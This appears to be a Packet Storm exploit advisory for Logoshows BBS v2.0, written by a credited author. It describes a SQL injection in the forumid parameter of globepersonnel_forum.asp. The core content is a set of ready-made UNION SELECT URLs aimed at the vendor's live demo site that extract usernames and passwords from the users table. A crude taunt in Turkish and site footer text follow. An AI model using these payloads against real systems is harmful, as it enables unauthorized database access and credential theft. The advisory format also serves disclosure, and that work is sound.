Logoshows BBS version 2.0 suffers from a remote SQL injection vulnerability.
af4498f265a6b9580edb14e9051ba4613673f311fb6b0e297586eafc344dcb7c__________________________________________________________________________________________________________________________
# Author : Ruzgarin_Oglu
# Script Name : Logoshows BBS v2.0
# Script Download : http://www.logoshows.com/download/bbs88.rar
# Vulnerable Type : Sql Injection
# Demo : http://www.logoshows.com/bbs/
# Licence And Pricing : $1.00 USD
# Special Thanks : By.Ultr@si(Student lol),Fortyseven,Rawage,Daniel-Koo,Subz3rr0,By.Seyfi,Fero,Septemb0x, ve ismini sayamadığım diğer dostlarım...
___________________________________________________________________________________________________________________________________
Exploit:
/globepersonnel_forum.asp?forumid=[SQL]
POC:
http://www.victim.com/[path]/globepersonnel_forum.asp?forumid=[SQL]
Example
Username:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users
Password:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users
----Note----
Herkesin bir s*k*lme zamanı vardır...
Bekleyin beni!
----Note----
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed